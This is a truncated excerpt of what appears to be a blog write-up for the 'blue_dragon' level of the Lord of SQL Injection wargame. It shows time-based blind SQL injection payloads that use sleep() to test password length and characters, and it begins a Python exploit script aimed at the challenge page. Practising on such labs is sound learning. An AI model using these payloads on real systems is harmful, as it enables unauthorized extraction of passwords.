Wargame/Lord of SQL Injection
[Lord of SQL Injection] blue_dragon
Prob Payload pw=' or if(id='admin' and length(pw)=8,sleep(3),1)%23 pw=' or if(id='admin' and ascii(substr(pw,1,1))=65,sleep(3),1)%23 Exploit import requests import string import time url = "https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php?" cookie = {'PHPSESSID':'vhk3v05udt053p3tubi0jcpovl'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "pw=' or if(id='a..
2022. 10. 4.